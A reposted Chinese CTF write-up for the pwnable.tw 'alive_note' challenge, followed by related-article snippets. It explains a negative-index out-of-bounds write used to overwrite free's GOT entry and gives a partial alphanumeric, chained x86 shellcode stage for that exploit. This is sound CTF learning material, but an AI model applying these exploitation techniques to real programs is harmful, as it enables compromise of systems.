【pwnable.tw】 alive_note

最新推荐文章于 2022-04-22 14:06:10 发布
最新推荐文章于 2022-04-22 14:06:10 发布
阅读量192 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/p4nda/p/7992951.html
本文介绍了一道考察Shellcode编写的高分题目。通过分析程序提供的查看、删除、添加等功能,揭示了如何利用未检查越界读取的问题来泄露内存地址。详细解释了如何构造特殊的shellcode绕过限制,最终实现对程序的攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

突然发现已经两个月没写过WP了,愧疚- -...

此题也算一道分数很高的题目,主要考察Shellcode的编写。

又是一道题目逻辑很简单的题。

首先提供了三个函数

查看,删除,添加

查看函数:

此函数中readint()使用atoi进行解析,没有检查小于0的情况,造成越解读,可以泄露libc地址(然并卵)

添加函数中一样有这个问题,并且可以任意写,

显然是一道覆盖got表的题,并且没有开启NX保护,就是可以写shellcode。

查看一下check函数

不太清楚__ctype_b_loc是什么check,不过可以fuzz一下。

发现只有如下这些是可以输入的

'''
0x0 0x20 0x30 0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38 0x39 0x41 0x42 0x43 
0x44 0x45 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d 0x4e 0x4f 0x50 0x51 0x52 
0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5a 0x61 0x62 0x63 0x64 0x65 0x66 0x67 
0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0x76 
0x77 0x78 0x79 0x7a

\x00   0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R 
S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z
'''

而这些机器码构成的汇编就可以做很多事情了,比如参考这个文档给出的汇编指令对应关系

https://wenku.baidu.com/view/bf5227ecaeaad1f346933f86.html

作为其他的限制,shellcode每块不许超过8字节,并且使用strdup建立堆块,也就是说不能有\x00。

根据堆的分配机制,每个堆块分配的大小应该是16字节,并且是连续的,因此可以shellcode链的方法进行跳转,比如使用JNE语句等。

选择覆盖的函数使用free函数,在delete函数时触发,原因是此时在寄存器里会有堆块相关的值。

此时调用free函数时,寄存器的值为:

eax            0x811f018	0x811f018   ;堆块地址
ecx            0x0	0x0
edx            0x0	0x0
ebx            0x0	0x0
esp            0xffd9597c	0xffd9597c
ebp            0xffd959a8	0xffd959a8
esi            0xf76b7000	0xf76b7000
edi            0xf76b7000	0xf76b7000
eip            0x80484e0	0x80484e0 <free@plt>
eflags         0x296	[ PF AF SF IF ]
cs             0x23	0x23
ss             0x2b	0x2b
ds             0x2b	0x2b
es             0x2b	0x2b
fs             0x0	0x0
gs             0x63	0x63

 以此寄存器的值构造shellcode,shellcode块之间使用3个小块填充即可

 

'''
read(0,heap,size)
shellcode 1
push eax  ;P  eax=heap
pop ecx   ;Y   
push ebx  ;S
pop eax   ;X
push 0x7a ;jz
jnz 0x38  ;u8
eax = 0  ebx = 0 ecx = heap edx = 0
shellcode 2 
pop edx   ;Z
dec eax  ;H
xor byte ptr[ecx+0x46],al ;0a5
jnz 0x39
shellcode 3
xor al,0x33  ;4c
xor byte ptr[ecx+0x47],al ;0a5
jnz 0x39
shellcode 4
push 0x33    ;j3
pop eax      ;X
xor al,0x30  ;40

'''+'2L'

 

转载于:https://www.cnblogs.com/p4nda/p/7992951.html

攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 725
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
net.ipv4.tcp_tw_reuse与net.ipv4.tcp_tw_recycle的区别,以及在高并发短连接场景下的参数优化方案
完颜振江
04-07 819
使用数据库连接池(如HikariCP)、HTTP长连接(Keep-Alive)减少短连接创建。示例:若两个NAT用户通过同一网关访问服务器,时间戳差异会导致后发请求被丢弃。会强制启用更严格的per-host PAWS检查(基于源IP而非四元组)。通过上述方案组合,可在保证协议完整性的前提下,实现短连接性能的阶跃式提升。典型案例:某金融系统开启该参数后,移动端用户登录失败率飙升至35%效果:某电商平台接入连接池后,TIME-WAIT连接减少92%对高频短连接服务(如Redis)采用UDP协议或QUIC替代。
pwnable.tw【start】
weixin_51055545的博客
04-22 415
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1626
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
Pwnable.tw WP
AlexYoung28的博客
08-18 971
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
pwnable.tw - hacknote(uaf漏洞利用)
fanghuapyk的博客
12-07 570
pwnable.tw -hacknote 前言: 看了几个大佬写的pwnable.tw-hacknote ,自己也尝试写一下; 程序分析: 首先运行一下程序 发现这里有add_note ,delete_note ,print_note三个功能,我们看一下main函数,add_note,和delete_note 函数, main函数: add_note函数: 可以看到首先为ptr+note_offs...
Install_TW7.0.4.1_Enterprise_Liunx.bin.zip
10-29
例如,检查服务状态,可以使用`systemctl status tw-server`(假设服务名为tw-server)。 8. **配置与使用**:首次使用时,可能需要按照官方文档或安装向导的指示进行一些基本的配置,如设置数据库连接、许可证信息...
.archLDPlayer9_tw_1000_ld.exe
11-03
.archLDPlayer9_tw_1000_ld.exe
Install_TW7.0.4.1_Enterprise_Liunx.bin
10-23
东方通Linux版本7.0.41安装包最新。适用麒麟系统 https://blog.csdn.net/weixin_30530523/article/details/96488724
Install_TW7.0.4.1_Enterprise_Windows.exe.zip
07-06
"Install"表明这是一个安装程序,"TW"是TongWeb的缩写,"7.0.4.1"代表软件的具体版本号,"Enterprise"表示这是为企业级用户设计的版本,具有更全面的功能和更高的性能要求,"Windows"则指明该版本是为Windows操作...
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1663
Pwnable.tw—start 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
pwnable.tw--->start 01
程序员晓老九
10-18 237
pwnable.tw 01 前提--->链接 PWNABLE.TW 02 Challenges 01 start IDA似乎看不出啥来 扔到peda里反汇编看一看,因为是x86(file可知),先写再读。 就知道这么点信息,没啥头绪,猜测是shellcode解。 write的长度是0x14,read的长度是0x3c,明显读的比写的长 覆盖_exit的offset是20,两种方法 1 在_start的ret处下断点--->到退出是20,32位对...
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 695
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw之3x17
蚁景网安学院
07-03 609
前言最近在pwnable做题遇到一道静态编译的二进制文件,并且是去除符号表的,从这道题可以学习到main函数的由来,以及start函数的部分知识。题目这里以pwnable.tw的3x17...
pwnable.tw Silver_Bulllet write up
qq_43189757的博客
10-30 248
程序保护: 程序逻辑分析: 1.创建银弹 在create_bullet 函数中输入得字符串得长度为银弹的power大小, 最大为0x30, 只能创建一次 &s -> &s + 48 存放字符串 &s + 48 存放power大小 2.Power 提升 如果银弹已被创建并且银弹的大小小于0x30, 那么可以提升银弹的power直至上限0x30 漏洞点: 漏洞点...
pwnable.tw dubblesort 经验总结
qq_43189757的博客
10-29 942
漏洞点: read函数读取的时候不会在数据末尾加上’\x00’ , 这就导致了可以泄露栈上的libc地址 v9 没有进行边界检查, 导致输入的数据可以导致栈溢出 写exp时碰到的问题: 1.IDA 生成的伪代码变量的表示位置出现问题 canary的值 显示是存放在esp + 0x7c 或 ebp - 0x10 上, 这两种应该都是指的同一地址, 但是实际调试的时候发现结果不一样 一开始是按...
pwnable.tw 题解笔记
我多么希望明天有太阳,来灼烧我腐烂的梦想
09-05 515
题目 orw 考察写shellcode 题目只允许使用read/write/open. 系统调用表: https://introspelliam.github.io/2017/08/06/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%BA%A6%E5%AE%9A/ #coding=utf-8 from pwn import * p = remote('chal...
pwnable.tw 第一题之start
像初雪一样自由洒落
04-26 634
今天学长布置了作业,,,做这道题,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看题 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
pwnable.tw applestore 经验总结
qq_43189757的博客
11-01 974
做了这题后对栈的理解又加深了一点 程序保护: 程序逻辑分析: 1.列出apple store 的商品 2.通过创建一个size为0x20 的chunk来存放需要购买的商品的数据 具体结构如下: str addr price next addr before addr 创建完毕后插入以mycart为头节点的双向链表中 ...
net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_tw_buckets = 20480 net.ipv4.tcp_max_syn_backlog = 20480 net.core.netdev_max_backlog = 262144 net.ipv4.tcp_fin_timeout = 20 在那个配置文件添加
最新发布
05-12
<think>好的,我需要帮助用户在Rocky Linux 9.5中添加几个内核参数的配置文件位置。用户提到的参数包括net.ipv4.tcp_syncookies、tcp_max_tw_buckets、tcp_max_syn_backlog、netdev_max_backlog和tcp_fin_timeout。 首先,我记得Linux系统中,内核参数的配置通常通过/etc/sysctl.conf文件或者/etc/sysctl.d/目录下的自定义配置文件来设置。Rocky Linux作为RHEL的衍生版,应该遵循相同的配置结构。用户之前的问题涉及SELinux的配置,而这次是关于网络内核参数的,所以需要确认正确的配置文件路径。 接下来,我需要验证每个参数对应的sysctl变量名是否正确。例如,用户提到的tcp_max_tw_buckets对应的sysctl参数应该是net.ipv4.tcp_max_tw_buckets,而netdev_max_backlog对应net.core.netdev_max_backlog。需要确保这些参数在sysctl中的正确命名,避免配置错误。 然后,用户可能希望知道如何永久修改这些参数,而不仅仅是临时生效。这意味着需要编辑配置文件而不是使用sysctl -w命令。需要指出正确的配置文件位置,并建议用户创建自定义配置文件以便管理,比如在/etc/sysctl.d/目录下创建一个新的.conf文件。 另外,用户引用的内容提到了TIME_WAIT状态的问题,这可能与tcp_max_tw_buckets和tcp_fin_timeout有关。需要解释这些参数的作用,以及调整它们可能带来的影响,比如减少TIME_WAIT连接数或优化连接队列。 还需要提醒用户在修改后运行sysctl -p来加载新配置,并检查是否生效。同时,考虑到用户之前的问题中提到了监控和调优记录,可能需要建议用户监控调整后的系统表现,以确保修改有效且没有副作用。 最后,用户可能需要了解如何临时修改这些参数进行测试,或者如何查看当前参数的值。需要将这些步骤包含在回答中,确保用户能够全面理解和操作。</think>### Rocky Linux 9.5 内核参数配置文件位置及配置方法 --- #### **1. 内核参数配置文件路径** Rocky Linux 9.5 中,内核网络参数的永久配置通过以下文件实现: - **主配置文件**:`/etc/sysctl.conf` - **自定义配置文件**:`/etc/sysctl.d/` 目录下(例如 `/etc/sysctl.d/99-custom.conf`) 系统会优先加载 `/etc/sysctl.d/*.conf` 文件,最后加载 `/etc/sysctl.conf`[^1][^2]。 --- #### **2. 添加指定内核参数** ##### **步骤一:编辑配置文件** 建议在 `/etc/sysctl.d/` 下创建自定义文件(避免直接修改主配置): ```bash sudo vi /etc/sysctl.d/99-network-optimization.conf ``` 添加以下内容(根据需求调整值): ```bash # 启用 SYN Cookie 防御 SYN Flood 攻击(1=启用,0=禁用) net.ipv4.tcp_syncookies = 1 # 限制 TIME_WAIT 状态的最大连接数(默认 32768) net.ipv4.tcp_max_tw_buckets = 20000 # 调整 SYN 半连接队列长度(默认 1024,需与 net.core.somaxconn 配合) net.ipv4.tcp_max_syn_backlog = 8192 # 设置网络设备接收队列的最大长度(默认 1000) net.core.netdev_max_backlog = 16384 # 调整 TCP FIN 超时时间(默认 60 秒) net.ipv4.tcp_fin_timeout = 30 ``` ##### **步骤二:应用配置** ```bash # 加载所有 sysctl 配置(包括新增文件) sudo sysctl --system ``` --- #### **3. 参数说明与建议** | **参数** | **作用** | **注意事项** | |-----------------------------|-------------------------------------------------------------------------|-----------------------------------------------------------------------------| | `net.ipv4.tcp_syncookies` | 防御 SYN Flood 攻击,当 SYN 队列满时启用 Cookie 验证[^3] | 生产环境建议保持启用(默认值 1) | | `net.ipv4.tcp_max_tw_buckets` | 限制 TIME_WAIT 状态连接数,避免占用过多资源[^1] | 若应用有大量短连接,可适当降低值 | | `net.ipv4.tcp_max_syn_backlog` | 控制 SYN 半连接队列长度,需与 `net.core.somaxconn` 配合[^2][^3] | 建议值不超过 `net.core.somaxconn` 的两倍 | | `net.core.netdev_max_backlog` | 网络接口接收数据包的缓冲队列长度,高流量场景需增大[^2] | 需结合网卡性能和系统负载调整 | | `net.ipv4.tcp_fin_timeout` | 控制 TCP 连接进入 TIME_WAIT 状态的等待时间 | 缩短时间可能加快端口复用,但需确保应用兼容性 | --- #### **4. 验证配置** - **查看当前生效值**: ```bash sysctl net.ipv4.tcp_syncookies \ net.ipv4.tcp_max_tw_buckets \ net.ipv4.tcp_max_syn_backlog \ net.core.netdev_max_backlog \ net.ipv4.tcp_fin_timeout ``` - **检查配置文件加载顺序**: ```bash sudo sysctl --system | grep "Loading settings" ``` --- #### **5. 临时调整参数(无需重启)** ```bash # 示例:临时调整 tcp_max_tw_buckets sudo sysctl -w net.ipv4.tcp_max_tw_buckets=20000 ``` > **注意**:临时修改重启后失效,需通过配置文件持久化[^1][^3]。 --- ### **注意事项** 1. **参数依赖关系**: `net.ipv4.tcp_max_syn_backlog` 需与 `net.core.somaxconn` 和 `net.ipv4.tcp_synack_retries` 协同调整。 2. **性能监控**: 修改后使用工具监控网络状态: ```bash ss -s # 查看 TCP 状态统计 netstat -s # 检查 SYN 丢包情况 ``` 3. **兼容性测试**: 修改 `tcp_fin_timeout` 或 `tcp_max_tw_buckets` 后,需验证应用是否因端口复用导致异常。 --- ### **示例配置文件** ```bash # /etc/sysctl.d/99-network-optimization.conf net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_tw_buckets = 20000 net.ipv4.tcp_max_syn_backlog = 8192 net.core.netdev_max_backlog = 16384 net.ipv4.tcp_fin_timeout = 30 ``` --- ### **相关问题** 1. 如何快速验证内核参数修改后的效果? 2. 调整 `net.core.somaxconn` 的配置文件路径是哪里? 3. 为什么修改 `tcp_max_syn_backlog` 后 SYN 队列仍然溢出?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值